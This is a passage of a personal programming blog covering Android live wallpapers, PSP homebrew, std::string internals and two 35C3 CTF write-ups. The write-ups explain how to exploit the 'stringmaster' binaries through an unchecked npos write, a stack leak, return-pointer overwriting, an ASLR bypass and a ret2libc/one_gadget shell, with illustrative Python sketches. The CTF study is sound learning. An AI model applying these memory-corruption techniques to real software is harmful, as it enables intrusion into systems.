The offbeat art of Android live wallpapers

Whether as a utility or as pure visual amusement, live wallpapers long felt to me like a niche: stigmatized as battery-draining, or just a triviality, an impression reinforced by the fact that nobody I know personally uses them.

Only recently, after stumbling upon this pure diamond on GitHub:

h3live
HOMM 3 themed live wallpaper by Ilya Pomaskin. I recommend building from the included Gradle files, as that worked fine for me.
https://github.com/IlyaPomaskin/h3lwp

…and refreshing my memories of playing H3:WOG for hours, I asked myself a few questions, including:

  • How exactly do you develop one?
  • What have people already accomplished, creativity-wise, in this field?

Well, the first question can be answered right away.

It boils down to creating an application that:

  • Always runs, even when in the background – achieved by creating a Service
  • Does not create a window of its own, but draws on an existing surface supplied by the system – achieved by making that Service extend WallpaperService specifically.

The only thing you need to do is implement a few methods (e.g. onTouchEvent, onVisibilityChanged) of the Android SDK’s WallpaperService and WallpaperService.Engine classes, and update your manifest file.

This can be done in the tool of your choice: whether you’re developing in Unity, LibGDX or Android Studio, when deploying to Android you can always override the default manifest file and provide additional Java files.

Actually, it is so simple that I created a repository with template files for live wallpapers using the mentioned technologies:

https://github.com/dbeef/CreatingAndroidLiveWallpapers

You can clone it and create your live wallpaper right away.
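I covered creating those templates in a series of three separate blog posts:

  • Creating live wallpaper in Android Studio
  • Creating live wallpaper in LibGDX
  • Creating live wallpaper in Unity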

Once you install such an application, it will be visible in your device’s wallpaper browser.

Coming to my second question: if they’re so easy to make, there must be tons of live wallpapers whose creativity didn’t simply end at:

Let’s take an image, split it into layers, and add the parallax effect!

And indeed there are. There’s a wallpaper that takes a GLSL shader as input and renders it as the wallpaper. Another one is an implementation of John Conway’s classic 1970 Game of Life. Yet another draws Conky-like system information (RAM, CPU, network usage), and another opens a random Wikipedia article (I would fancy one that opens cppreference, though).

shaderEditorWallpaper
ShaderEditor – Lets you input a GLSL shader and use it as a live wallpaper.
https://github.com/markusfisch/ShaderEditor
bouncingDvd
DVDLiveWallpaper – Just what you see.
https://github.com/PHELAT/DVDLiveWallpaper

Seemingly, making one’s own wallpaper is a form of self-expression, like wearing that blue shirt with the name of a band you like, or of customization, like the choices people make when buying smartphone cases.

Flowers
SpaceBattle
Be careful, there’s a space battle going on!
https://github.com/jinkg/Style

I offer no conclusion other than that it is a satisfying weekend project to do when your current project stretches over many months and drags you down.

Creating live wallpaper in Unity

This post is part of my series on Android live wallpapers.
Visit my other blog posts where I cover creating live wallpapers in:

  • Android Studio
  • LibGDX

Templates for all three technologies are on my repository:
https://github.com/dbeef/CreatingAndroidLiveWallpapers


After covering live wallpapers in Android Studio (a post I recommend reading first, as it explains the concepts I use here), I had some understanding of what I wanted to do in Unity, which was:

  • Override the default AndroidManifest.xml that Unity creates
  • Add one custom Java class, referenced from the overridden manifest
  • Add another resource XML file

Additionally, as Unity creates its own Activity when exporting as an Android project, I wanted to reference that Activity from the Service declared in my Java class, so I could render the Unity scene when running as a wallpaper.

So I created a clean new Unity project and set it up to build for Android.

After some quick Googling, it looked like adding my custom Android-specific code to a Unity project essentially comes down to… creating an Assets/Plugins/Android directory (from the root of the project) and copying my files there.

When listing files from that directory:

listing_unity

So what I did was copy res and the *.java files from my Android Studio project, omitting SimpleWallpaperActivity.java, as Unity provides its own Activity.

I also omitted the AndroidManifest.xml file. The one provided by Unity (when exporting as an Android project) was a bit bloated, so it was more efficient to copy just the specific content I needed into Unity’s: the whole service tag and the uses-feature tag from my Android Studio project.

What was still needed at this point was to reference Unity’s Activity to render the scene.
As I don’t normally use Unity, I gave up after some time and found an existing wallpaper service by PavelDoGreat that utilizes Unity’s Activity:

https://github.com/PavelDoGreat/Unity-Android-Live-Wallpaper/blob/master/WallpaperActivity.java

Keeping the package name consistent between Unity and the classes I supplied was essential; otherwise some symbols may be undefined.

You can set package name in Unity’s:
Edit -> Project Settings -> Player.

What then? Just hit Unity’s Build and run.

Creating live wallpaper in LibGDX

This post is part of my series on Android live wallpapers.
Visit my other blog posts where I cover creating live wallpapers in:

  • Android Studio
  • Unity

Templates for all three technologies are on my repository:
https://github.com/dbeef/CreatingAndroidLiveWallpapers


Creating a live wallpaper in LibGDX is only a step further from creating one with Android Studio’s no-activity template (I suggest having a look at my post covering it, as I will mention concepts that I explain there).

There’s a service, but it does not extend WallpaperService directly – it extends LibGDX’s AndroidLiveWallpaperService, which in turn extends WallpaperService.

There’s no plain Activity that extends Activity – there’s one that extends AndroidApplication.

There’s an AndroidManifest.xml with the very same changes as in the Android Studio project, and drawing happens in LibGDX’s core project (as LibGDX is multi-platform, it generates android/ios/core/desktop/html projects, where core holds the shared code and the others are mostly stubs for launching on a specific platform).

Creating live wallpaper in Android Studio

This post is part of my series on Android live wallpapers.
Visit my other blog posts where I cover creating live wallpapers in:

  • LibGDX
  • Unity

Templates for all three technologies are on my repository:
https://github.com/dbeef/CreatingAndroidLiveWallpapers



Open your Android Studio, then on your menu bar, select:

File -> New Project -> Add No Activity.

Just like in the image below:
post_android_studio
Then, name your application as you wish and choose Java as the language (Kotlin would work too; it doesn’t change the basics of what I cover in this post).
Click finish when you’re done.

Open Project view on your left-side menu, and in path:

app/src/main/java/yourpackagename

Create files:

SimpleWallpaperActivity.java
SimpleWallpaperService.java

Just like on the image below:

post_android_studio_2

Why do we need an Activity and a Service? Android SDK defines them as:

An Activity is a single, focused thing that the user can do. Almost all activities interact with the user, so the Activity class takes care of creating a window for you in which you can place your UI with setContentView(View). (…)
The Activity class is an important part of an application’s overall lifecycle, and the way activities are launched and put together is a fundamental part of the platform’s application model. For a detailed perspective on the structure of an Android application and how activities behave, please read the Application Fundamentals and Tasks and Back Stack developer guides.

Service is an application component that can perform long-running
operations in the background, and it doesn’t provide a user interface.
Another application component can start a service, and it continues to run
in the background even if the user switches to another application.
Additionally, a component can bind to a service to interact with it
and even perform interprocess communication (IPC). For example, a service
can handle network transactions, play music, perform file I/O, or interact
with a content provider, all from the background.

So adding a single Activity is required, and Services are optional and needed in special cases.

From the Service description one can understand why live wallpapers need one:
they have to do work in the background, unlike most other Android applications or games.

The SDK provides a special kind of Service, WallpaperService, which, once implemented, takes care of drawing when the wallpaper is visible.

Documentation describes it as:

A wallpaper service is responsible for showing a live wallpaper behind applications that would like to sit on top of it. This service object itself does very little — its only purpose is to generate instances of Engine as needed. Implementing a wallpaper thus involves subclassing from this, subclassing an Engine implementation, and implementing onCreateEngine() to return a new instance of your engine.

Now, knowing what the files we’ve just created are supposed to contain, let’s provide some source.

SimpleWallpaperActivity.java will be as simple as:

simplewallpaperactivity

…since we don’t need our wallpaper to contain any UI when running as an application (yes, it will still be runnable and visible in your device’s apps list; besides, this activity will be run when the user requests the wallpaper’s settings, as you will find out later).

Real work is done in SimpleWallpaperService.java:

androidstudio3.png

For simplicity I did not bother to use OpenGL in this example, so you will have to make do with draw calls on Android’s Canvas instance.

Instances of the Android SDK’s Handler and Java’s Runnable are created to handle drawing outside of the overridden methods – the handler acts as a queue for draw() commands.

Under src/main/res/xml/ create wallpaper.xml:

snip_xml

The comment I added in the xml itself says everything.
Finally, create AndroidManifest.xml:

manifest

There are 3 notable points in this manifest file that distinguish it from an ordinary application:

  • uses-feature tag in line 39, that requires a device capable of live wallpapers
  • service tag starting from line 8, requiring BIND_WALLPAPER permission
  • meta-data tag, that points to the activity that is run when user requests wallpaper’s settings

Now you can build and install the wallpaper.

As I mentioned, code is on my repository:
https://github.com/dbeef/CreatingAndroidLiveWallpapers

Starting with PSP homebrew!

The result of my first 24 hours with the PSP toolchain.

Just yesterday, I cloned psptoolchain from GitHub and built it:
https://github.com/pspdev/psptoolchain
And I’m just thrilled to do some programming on it.
I compiled some of the shipped samples and tried them on the PPSSPP emulator, and also cloned & built Minecraft-PSP:
https://github.com/Woolio/Minecraft-PSP

I had some problems though, e.g. the shipped samples needed a flag set in their makefile in order to work properly:

USE_PSPSDK_LIBC = 1

Which I took from one of their issue pages:

https://github.com/pspdev/pspsdk/issues/26

And in the Minecraft-PSP, I needed to remove linkage with MMIO, since there was no such library provided, and comment out a few functions (which utilized MMIO, but were not called anyway). Here it is:

minecraft.png

And the reflections sample:

reflections

 

My 35C3 CTF writeup IV – stringmaster2

Introduction

Stringmaster2 is a continuation of the previous task, stringmaster1 which I covered here:
https://dbeef.lol/2019/01/27/my-35c3-ctf-writeup-iii-stringmaster1/
I recommend you read it, since I’ll refer to it in this writeup.

What we find in the distrib folder this time is:

stringmaster2_ls

You may wonder why they would include the libc (against which stringmaster2 is linked), but we’ll come to this soon.
Now, let’s see what changed in the source since stringmaster1:

stringmaster2_diff

There are two differences:

  1. Code – There’s no spawn_shell function provided this time – we can’t dump its address and overwrite return pointer from the play function with it.
  2. Security measures – Binary is compiled with PIE and stack protector enabled.

PIE stands for Position Independent Executable, which relates to PIC (Position Independent Code), since PIEs are made entirely of PIC.
You can read up on how it works on Wikipedia; what it changes in the context of solving this CTF is:

  • Even if we had the spawn_shell function ready in the binary, this time we couldn’t use its absolute address dumped from the binary like in the 1996 task.
  • We can’t just set a breakpoint at an arbitrary address using gdb – though we could fix that by recompiling our local stringmaster2 binary if we really wanted to do some inspection.

If the stack protector is enabled, another value, called a stack canary, is placed on the stack frame before the return address and (optionally) the frame pointer. A buffer overflow attack that redirects code execution, like in the 1996 writeup, overwrites bytes starting at some variable’s address on the stack all the way up to the return pointer, so the values in between get overwritten too, and thus the stack canary changes its value.
The compiler injects code that checks whether that value changed, and if so, terminates the program to prevent exploitation.
You can read more about that on Wikipedia:

https://en.wikipedia.org/wiki/Buffer_overflow_protection#Canaries

But the good news is that neither is an obstacle. Like in stringmaster1, we can overwrite arbitrary bytes on the stack frame, so the canary value won’t be overwritten until we specifically do it. As for PIE: we don’t have the spawn_shell function in the binary anyway, so we’ll need to return somewhere else – but where?
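To make the difference between a classic linear overflow and our targeted writes concrete, here is a small Python model of a stack frame. It is only a sketch: the layout (16-byte buffer, 8-byte canary, 8-byte frame pointer, 8-byte return pointer) and every value in it are made up for illustration, and a real frame depends on the compiler and the function.

```python
import struct

# Hypothetical frame layout, lowest address first:
# 16-byte buffer | 8-byte canary | 8-byte frame pointer (offset 24) | 8-byte return pointer
BUF, CANARY, RET = 0, 16, 32
FRAME_SIZE = 40
CANARY_VALUE = 0x1122334455667700  # made up; a real canary is random per process
OLD_RET, NEW_RET = 0x1000, 0x2000  # made-up return addresses


def fresh_frame() -> bytearray:
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<Q", frame, CANARY, CANARY_VALUE)
    struct.pack_into("<Q", frame, RET, OLD_RET)
    return frame


def canary_intact(frame: bytearray) -> bool:
    # Stands in for the check the compiler injects before the function returns.
    return struct.unpack_from("<Q", frame, CANARY)[0] == CANARY_VALUE


# Linear overflow: fill everything from the buffer up to and including the return pointer.
linear = fresh_frame()
linear[BUF:FRAME_SIZE] = b"A" * FRAME_SIZE

# Targeted write: touch only the 8 bytes of the return pointer.
targeted = fresh_frame()
struct.pack_into("<Q", targeted, RET, NEW_RET)

print("linear overflow, canary intact:", canary_intact(linear))
print("targeted write, canary intact:", canary_intact(targeted))
```

The linear overflow tramples the canary on its way to the return pointer, while the targeted write leaves it untouched, which is why the stack protector does not stop the byte-level writes this task allows.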

Return to libc

The return-to-libc (ret2libc) technique is based on replacing the return pointer’s value with an address from the C library. It may be the execve function, the same one that was called in spawn_shell in stringmaster1, it may be any other function, or even a specific instruction within those functions!
Calling execve this way would involve overwriting:

stack_frame.jpg

  1. Return pointer, previously storing an address of a line in main function, to which call from play will return.
    It would be overwritten with an address of execve function (8 bytes).
  2. Address after that, would need to point to a literal with “/bin/bash” (where would we find it – later) – 8 bytes.
  3. Again, pointer to a literal with “/bin/bash” – 8 bytes.
  4. Pointer to NULL, which would be 8 zeroed bytes.
  5. Again, pointer to NULL – 8 zeroed bytes.

Where can we find execve’s address?

regex

Where can we find the “/bin/bash” literal I mentioned?

strings

It’s in the libc, just like execve, but how did it get there?

Let’s download libc sources and find out.
I got mine (version 2.27) from https://ftp.gnu.org/gnu/glibc/.

libc_source
grep -rni . -e “/bin/sh” recursively searches for “/bin/sh” in the current path.

As you see, there are some execve calls with the const char literal “/bin/sh” passed as an argument, which means that those literals eventually end up in the read-only data (.rodata) section of the libc .so file, with pointers to them passed as arguments whenever one of those calls happens.
Now that we know how to manually craft a function call to execve with “/bin/bash” as an argument, I will tell you why we won’t do it in this case – though what we’ve learned will come in handy, since what we’ll really do is very similar.

See, when we did stringmaster1 last time, swapping bytes to make the return pointer hold the address of spawn_shell was very unstable – the program crashed at random, and we only tried to swap 8 bytes!
Swapping all the bytes of our manually crafted call stack would involve swapping 40 bytes, not to mention that we would need to have those 40, mostly different, values somewhere on the leaked stack (and that takes a lot of luck).
What if there were a way to jump directly to the place in libc where execve(“/bin/bash”) is called (already with its arguments set up!), just as we’ve seen in the libc sources, without planting function arguments?

Return Oriented Programming

ROP is the technique I’ve just suggested. Find some place in the existing code that you want to execute, get its address and jump to it. Those places that can be jumped to are called ROP gadgets.

We won’t waste time finding one manually, since there is already a tool specifically for finding execve gadgets (though I’ll make another post about this later). It’s called one_gadget and can be downloaded here:
https://github.com/david942j/one_gadget

After installation, we’ll call one_gadget with path to our libc as an argument:

one_gadget.png

That’s it: we’ve been given 3 variants, each with different constraints on register values at the time of the call. We’ll use the first one, but it makes no difference to us which one we call.

Return to the plan

So we could use the same Python exploit we used before, just with another value to substitute for the return pointer (this time the gadget instead of spawn_shell), couldn’t we?
Er, no. There’s one last thing I didn’t mention: ASLR, which stands for Address Space Layout Randomization.

The gadget’s address we just took from the libc is not an absolute address but an offset: it only accounts for the distance from the beginning of the .so file.
It becomes a valid address only once we add the libc base address to it (the address at which libc is loaded in the process), and due to ASLR the base address changes every time we run the application!
See how the base address changes (ldd runs the program and prints the addresses at which libraries are loaded):

ldd_stringmaster

As an experiment, let’s temporarily disable ASLR and invoke ldd once again:

no_aslr.png

As you can see, this time the addresses don’t change – how easy it would be to exploit without ASLR! We could just take this permanent libc base address, add the offset of our gadget (its address within the .so file) and run a Python script that changes the return pointer’s value.

So in what manner do we defeat ASLR?

Let’s have a detailed look at what’s on the stack of a very simple program:

stack_example

I’ve printed the first 20 addresses on the stack while stopped at a breakpoint in the main function. As you see, we have plenty of addresses that refer to the C library!

The first one, __libc_csu_init, is the frame pointer in our stack frame; the second one, <__libc_start_main+231>, is the return pointer – the 231 part means that it points 231 bytes past the beginning of this function. So we return into the libc function that called our main in the first place, when bootstrapping the process!
If you want some details on why those addresses are here (not of much relevance for solving this task), you can see the answer I gave on Information Security Stack Exchange:

https://security.stackexchange.com/a/203313

The same thing happens in stringmaster2’s case: we return to <__libc_start_main+231> too, and what’s nice is that this address is also leaked in stringmaster2.

Now it’s time to add up the facts:

  • We need the libc base address (to which we’ll add the offset of our gadget within the .so file)
  • We have both the offset (from gdb) and the [base + offset] address (from the leak) of <__libc_start_main+231>
  • We can calculate the base address!

Our addresses:
gdb_libc_main

__libc_start_main = 0x21AB0
__libc_start_main + 231 = 0x21B97

At which position will we find <__libc_start_main+231> in stringmaster2’s leak?
At the same one we used before: the 18th 8-byte word of the leaked data is the return pointer, and the program tries to return to <__libc_start_main+231>.

The final algorithm is the same as in stringmaster1, with one step added before replacing the return pointer, because we need to calculate the value to replace it with:

  1. Get integer value from 8 bytes starting at (17 * 8) index of leaked bytes array
  2. Subtract 0x21B97 from that value and assign it to libc_base
  3. Bytes for further replacing are [libc_base + gadget_addr]
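The three steps above can be sketched in Python as follows. This is a minimal illustration, not the script from the final attack: GADGET_OFFSET is a placeholder for whichever value one_gadget printed, and the leak used in the usage part is fabricated.

```python
import struct

LIBC_START_MAIN_OFFSET = 0x21AB0      # __libc_start_main, from gdb
LIBC_START_MAIN_RET_OFFSET = 0x21B97  # __libc_start_main+231
RETURN_POINTER_INDEX = 17             # 18th 8-byte word of the leak
GADGET_OFFSET = 0x12345               # placeholder: use the offset one_gadget printed

# Sanity check of the "+231" arithmetic.
assert LIBC_START_MAIN_OFFSET + 231 == LIBC_START_MAIN_RET_OFFSET


def gadget_address(leak: bytes) -> int:
    # Step 1: read the leaked return pointer as a little-endian 64-bit integer.
    (leaked_ret,) = struct.unpack_from("<Q", leak, RETURN_POINTER_INDEX * 8)
    # Step 2: subtract the known offset to get the address libc is loaded at.
    libc_base = leaked_ret - LIBC_START_MAIN_RET_OFFSET
    # Step 3: the runtime address of the gadget is base + offset.
    return libc_base + GADGET_OFFSET


# Usage with a fabricated leak: pretend libc was loaded at 0x7f1234567000.
fake_base = 0x7F1234567000
fake_leak = bytes(RETURN_POINTER_INDEX * 8) + struct.pack(
    "<Q", fake_base + LIBC_START_MAIN_RET_OFFSET
)
print(hex(gadget_address(fake_leak)))
```

A handy sanity check while experimenting: the computed libc_base should be page-aligned (its lowest 12 bits zero); if it isn’t, the wrong word of the leak was probably read.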

That’s how ASLR can be defeated: by leaking some address from libc whose target we know (<__libc_start_main+231> in this case).

Final attack

This time I moved the part which sends commands into a Client class, but in essence the code is almost the same as for stringmaster1, apart from calculating the libc base.

Summary

So far, this was the most complex task, since it involved:

  • Knowing how libc bootstraps processes: their flow starts not in your main function but in __libc_start_main, which then redirects the flow to your main, and in the end, when your main returns, it returns to <__libc_start_main+231>.
    You can read more on that on this excellent blog:
    http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html
  • Knowing that, because of ASLR, you can’t just use an address extracted from libc without knowing the base at which libc is loaded in the current process instance.
  • Knowing about ROP gadgets, since crafting a call stack for execve yourself is too unstable to work with the given commands (swapping/replacing bytes on the stack).

Resources

If you’re curious how a process can use libc at a different address on every run while its own code does not change, read about the Global Offset Table and the Procedure Linkage Table:

https://en.wikipedia.org/wiki/Global_Offset_Table

Also, I’ll have a look at this:
https://github.com/Gallopsled/pwntools
since it looks popular and it’ll probably make solving CTFs easier.

 

My 35C3 CTF writeup III – stringmaster1

Introduction

As this task is one category higher than the last one (very easy -> easy), I wrote a separate blog post about std::string, as some knowledge about it is required for this task, and I assume you’ve already read it.
Link:
https://dbeef.lol/2019/01/20/stdstring/

After cd-ing to this task’s distrib directory we’ll see a binary and its C++ source code, from which we learn that the binary already provides a spawn_shell function, though it does not call it anywhere, and consists of 2 other functions, play() and main():

sm_3

sm1_main
As the play function contains a lot of boilerplate, I’ll omit the noise and post only the most important code, from which we’ll deduce an attack vector:

sm_2

Before I tell you how to exploit a vulnerability that is visible on this picture, let’s first run the binary to show what it prints:

stringmaster1_exe

As you see, it’s a simple game of making two strings equal by gradually replacing/swapping characters.
Now, going back to the code from the previous image: you may have already noticed that the “replace” command does not validate the returned index at all! If you input a character that does not exist in the string, the search returns std::string::npos, which is 8 bytes, 0xFFFFFFFFFFFFFFFF.

That means, that if we try to access
[string’s data pointer address] + [0xFFFFFFFFFFFFFFFF]
we’re going to end up with…
[string’s data pointer address] – minus one byte!
If you don’t get it, I explained pointer overflow in the post linked above.
As a consequence, we end up writing into the last byte of the string’s length field. That makes the string’s length hold a ridiculously high value, and allows us to print more information with the “print” command:

gibberish
You may wonder – what use do I have from this seemingly random data?

Vector of attack – return pointer overflow

This data gives us 2 important facts:

  • position of return pointer from play function;
    we’ll inject address of spawn_shell there.
  • position and value of a set of bytes that we could use with “swap” command;
    we’ll use them to swap bytes of play’s return pointer

Of course, we won’t do this manually, as it’s too cumbersome. We’ll write a Python script for that, but first we’ll need 2 more facts that gdb is going to provide:

  • spawn_shell address
  • address of instruction that comes just after call to play function in main function; it’s going to be the value of return pointer in play function – from that fact we’ll know which bytes to swap to make it return to spawn_shell instead

First one is a simple matter of:

p_spawn_shell

spawn_shell’s address is 0x00000000004011a7 (left-padded to 16 hex digits, i.e. 8 bytes, since I’m working on an x86_64 platform).
For the second one, we’ve got to disassemble main and find the call to the play function:

calls

As you see, return pointer value’s going to be 0x000000000040246d.

Now we have all the information we need; it’s time for the python script.
I won’t comment on it much since it’s self-explanatory, but the algorithm is:

  1. Connect to program (it’s running on a Docker image on port 22224)
  2. Wait until it sends the command prompt text (and do so after sending every command)
  3. Send ‘replace X a’ – X, since there are no upper case characters in those strings, so it’s always safe to pick one of those; ‘a’, since the program seemingly doesn’t crash that much when replacing with a’s, but it’s only an arbitrarily chosen character, any other will do.
  4. Send a ‘print’ request to get info on what comes after the string’s local data pointer
  5. Find the index of the return pointer (0x40246d) in what ‘print’ returned – I found it manually by printing the hex of the returned data to the console before writing the rest of the script and just hardcoded it, but one can easily code a search for it.
  6. Find the indexes of the 0x40, 0x11 and 0xa7 bytes. There’s a chance they will be somewhere in the program’s memory, there’s a chance they won’t. If not, just restart the exploit, since the stringmaster1 binary is re-spawned on every connection.
  7. Replace the return pointer’s bytes with bytes from the indexes we’ve found in the last step
  8. Send ‘exit’ to make it return to spawn_shell
  9. Send ‘ls’
  10. Send ‘cat flag.txt’
  11. Pwned
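Steps 5 to 7 are the heart of the exploit, so here is a small offline sketch of them in Python. It is not the script from the screenshot below: plan_swaps and apply_swaps are hypothetical helper names, the leak is fabricated, and the swaps are simulated locally instead of being sent over a socket.

```python
import struct

RET_VALUE = 0x40246D    # return pointer value, from gdb
SPAWN_SHELL = 0x4011A7  # spawn_shell address, from gdb


def plan_swaps(leak: bytes, ret_index: int, target: int):
    """Return (destination, source) index pairs, or None if a needed byte is missing."""
    wanted = struct.pack("<Q", target)  # little-endian, as stored in memory
    ret_range = range(ret_index, ret_index + 8)
    used = set()
    swaps = []
    for offset, byte in enumerate(wanted):
        dest = ret_index + offset
        if leak[dest] == byte:
            continue  # this byte of the return pointer is already correct
        source = next(
            (i for i, b in enumerate(leak)
             if b == byte and i not in ret_range and i not in used),
            None,
        )
        if source is None:
            return None  # no luck this run: reconnect and try again
        used.add(source)
        swaps.append((dest, source))
    return swaps


def apply_swaps(leak: bytes, swaps) -> bytes:
    """Simulate the 'swap' command locally on a copy of the leak."""
    data = bytearray(leak)
    for dest, source in swaps:
        data[dest], data[source] = data[source], data[dest]
    return bytes(data)


# Fabricated leak: a few stray bytes, then the return pointer at index 16.
leak = bytes([0x00, 0xA7, 0x33, 0x11]) + bytes(12) + struct.pack("<Q", RET_VALUE)
swaps = plan_swaps(leak, 16, SPAWN_SHELL)
patched = apply_swaps(leak, swaps)
print(swaps, hex(struct.unpack_from("<Q", patched, 16)[0]))
```

Note that 0x40246d and 0x4011a7 already share the 0x40 byte and the zero padding, so in this model only the two lowest bytes of the return pointer need to be swapped.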

Final attack

screenshot from 2019-01-27 17-11-19

Summary

Docker was convenient, but I’ll try to exploit the binary without Docker, hooking the Python script to stdout without sockets, just for further experiments.
Also, my Python skills need some improvement.

std::string

I started writing up the 35C3 CTF task stringmaster1, but as I progressed I realized I’d need another blog post to cover the nuances of std::string without overloading a potential reader. Here we go, std::string byte by byte.

std::string in gdb

Imagine such a program:

example_fixed.png

Compiled like this:

string_example_comp

Let’s start it in gdb and disassemble the main function:

dump_fixed.png

I highlighted 3 addresses: where do they point to?

As you probably know (and if you don’t, here’s a link to the Wikipedia):

The .data segment contains any global or static variables which have a pre-defined value and can be modified. That is any variables that are not defined within a function (and thus can be accessed from anywhere) or are defined in a function but are defined as static so they retain their address across subsequent calls.

The string values that we hardcoded must come from somewhere, and the addresses that the disassembled code uses seem to point into the .data segment. We can verify this by executing info variables in gdb and scrolling to the surroundings of this address:

data_start.png

As you see, this address is listed above the __data_start symbol (it has a lower address), which places it just before .data, in the read-only data (.rodata) section, where the compiler puts string literals.
Figuring it out would be easier by calling nm string_example outside of gdb (gdb prints much more than we need).
But I am drifting off topic, let’s focus on the strings themselves.

Let’s set a breakpoint at some address near the end of the program, after all three strings have been initialized with the given values, and print the strings’ addresses:

asdasd

So strings’ addresses are:

s1 - 0x7fffffffda90
s2 - 0x7fffffffda70
s3 - 0x7fffffffda50

std::string takes 32 bytes on my x86_64 computer – one can verify that by running a program that prints sizeof(std::string).
Since the strings are declared one after another, by printing 3 * 32 bytes after the address of first string, we’ll see all 3 of them:

addresses.png
x/24x 0x7fffffffda90 means: print 24 4-byte chunks, starting at address 0x7fffffffda90.
You get that count by dividing the number of bytes you want printed by 4: (32 * 3) / 4 = 24 in our case.

Here’s where the action starts.
Since we know that each std::string occupies 32 bytes, I’ll mark them with different colors and label them by variable name:

addresses_2 fixed.png

We know lengths of our strings, which are:

s1 - "123" - 3 - 0x3
s2 - "123456789" - 9 - 0x9
s3 - "1234567890abcdefgh!@#" - 21 - 0x15

Can we identify such bytes on the image? Yes. That’s the 4th column on the image above:

addresses_3_fixed.png

From looking at the sources (we’ll cover them later) I know that the length should be a 64-bit value, so the length takes 2 columns (2 x 4 bytes = 64 bits).

What else can be identified?
Individual characters we put into the strings.

Look at the first and second column – 0x34333231, then 0x38373635, and then 0x39, when converted from ASCII values, spell out what that string contains:

decode.png
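If you’d rather not decode those words by hand, the conversion can be sketched in a few lines of Python. The only assumption is that gdb printed the memory as little-endian 32-bit words, which is the case on x86_64:

```python
import struct

# The three words gdb showed for the string's local data.
words = [0x34333231, 0x38373635, 0x00000039]

# Pack them back into raw memory order (little-endian), then read as ASCII.
raw = struct.pack("<3I", *words)
text = raw.rstrip(b"\x00").decode("ascii")

print(raw.hex(" "))
print(text)  # 123456789
```

The lowest byte of each word comes first in memory, which is why 0x34333231 reads as “1234” and not “4321”.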

Marking our finding on the image with a ‘d’, as an abbreviation of ‘data’:

addresses_4.png

But wait, look at s3, the longest one – where’s the data we supplied? It doesn’t appear in the same manner as in the other strings… We’ll come to this in a second.
In the meantime, look at the first 4 bytes of our strings, in the second column.
In s2 and s1 it appears that this value points to (stores the address of) the ‘d’ section.
So this value must be the pointer to the string’s data!
Again, let’s mark our finding on the image with a ‘p’, as in ‘pointer’:

addresses_5.png

And that answers the question asked just before: s3’s data is stored away from the actual string object, at 0x00614c20. Printing it reveals the string that we put into s3 before:

values_ee.png

Which makes:

sssssss.png

That raises a question: why are some strings stored locally, and some externally, on the heap?*
And a question that a watchful reader would ask: what’s stored in the column we didn’t mark, between the 4th and 8th bytes of std::string?

*We know that address 0x00614c20 is on the heap, since we can check the heap’s start/end addresses via info proc mappings in gdb:
info proc ma.png

0x00614c20 is bigger than 0x603000, but smaller than 0x635000.

 

std::string in sources

The answer to those questions lies in std::string’s sources.

You can access them e.g. by opening them in your IDE, like CLion: press Ctrl + N and type string, and it will look up the class definition.
Another way is just printing the header from the command line, like:

pygmentize /usr/include/c++/8/bits/basic_string.h

One way or another, we’ll find std::string definition. The chunk which interested me is:

stdstring.png

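It defines the fields of the string that we’ve marked on the images. There’s the string’s length, the pointer to its data, and an array for local data (a union of either the capacity or a 16-byte buffer: 15 characters plus the terminating null). The pointer lives in a small struct that derives from allocator_type, but the allocator itself adds no bytes, so the field we couldn’t figure out is simply the upper half of the 64-bit data pointer. Let’s mark it on the image:

That makes sense! s1 and s2, which both have their data stored locally on the stack, share the same upper pointer bytes, while s3’s pointer leads to a much lower heap address, so its upper half is zeroed.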

addresses_6.png

So where the data lives depends on the string’s length. The local buffer holds up to 15 characters, so if we try to store a bigger string, like in the case of s3, it’s going to be allocated on the heap instead. This optimization has a name:

small string optimization
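As a toy model of that rule (not the real implementation, which lives in basic_string.h), the decision can be written down in Python. LOCAL_CAPACITY is taken from the 15-character limit described above, and stored_locally is a hypothetical helper name:

```python
LOCAL_CAPACITY = 15  # characters that fit in the local buffer, per the text above


def stored_locally(text: str) -> bool:
    """Model only: True if a string of this length fits in the local buffer."""
    return len(text.encode("ascii")) <= LOCAL_CAPACITY


for name, value in [("s1", "123"), ("s2", "123456789"), ("s3", "1234567890abcdefgh!@#")]:
    where = "local buffer" if stored_locally(value) else "heap"
    print(f"{name}: {len(value):2d} chars -> {where}")
```

For our three strings this agrees with what gdb showed: s1 and s2 stay inside the string object, and the 21-character s3 goes to the heap.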

If you want to read more about it, here are the sources I used:

https://stackoverflow.com/questions/21694302/what-are-the-mechanics-of-short-string-optimization-in-libc

https://stackoverflow.com/questions/10315041/meaning-of-acronym-sso-in-the-context-of-stdstring/10319672#10319672

https://stackoverflow.com/questions/27631065/why-does-libcs-implementation-of-stdstring-take-up-3x-memory-as-libstdc/28003328#28003328

https://blogs.msmvps.com/gdicanio/2016/11/17/the-small-string-optimization/

There’s more – std::string::npos

As cppreference states:

This is a special value equal to the maximum value representable by the type size_type. The exact meaning depends on context, but it is generally used either as end of string indicator by the functions that expect a string index or as the error indicator by the functions that return a string index.

Note

Although the definition uses -1, size_type is an unsigned integer type, and the value of npos is the largest positive value it can hold, due to signed-to-unsigned implicit conversion. This is a portable way to specify the largest value of any unsigned type.

On my x86_64 platform, given program:

nposs

prints:

np

It’s 16 times F, since:

a byte = 8 bits, max value is 0b11111111 = 2^7 + 2^6 + … + 2^0 = 128 + 64 + … + 1 = 255
a byte in hex = 0xff, max value is (F * 16 + F) = 15 * 16 + 15 = 255.

So, in other words, 16 hex digits of F are 8 bytes = 64 bits, all of them set.

I’m mentioning it because there can be programs that use it without validation, like:

printing_npos_add

Which prints:

comp

As the condition we provided lacked a check for the index being equal to npos, we’ve overwritten the length of some_string, and consequently made it try to print all
0x5800000000000003 bytes that follow the address pointed to by some_string’s data pointer.
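Where does a number like 0x5800000000000003 come from? Here is a rough Python model of the string object’s memory. It assumes the layout found earlier in this post (8 bytes of pointer, 8 bytes of length, 16 bytes of local buffer), a string of length 3, and that the byte written was ‘X’ (0x58); the last two are guesses that happen to match the printed value, and the string content is made up.

```python
import struct

NPOS = 0xFFFFFFFFFFFFFFFF
MASK_64 = 0xFFFFFFFFFFFFFFFF

# Model of a short std::string object, little-endian:
# bytes 0-7 data pointer (left zeroed here), 8-15 length, 16-31 local buffer.
LENGTH_OFFSET, DATA_OFFSET = 8, 16
obj = bytearray(32)
content = b"abc"  # made-up content of length 3
struct.pack_into("<Q", obj, LENGTH_OFFSET, len(content))
obj[DATA_OFFSET:DATA_OFFSET + len(content)] = content


def write_at(index: int, value: int) -> None:
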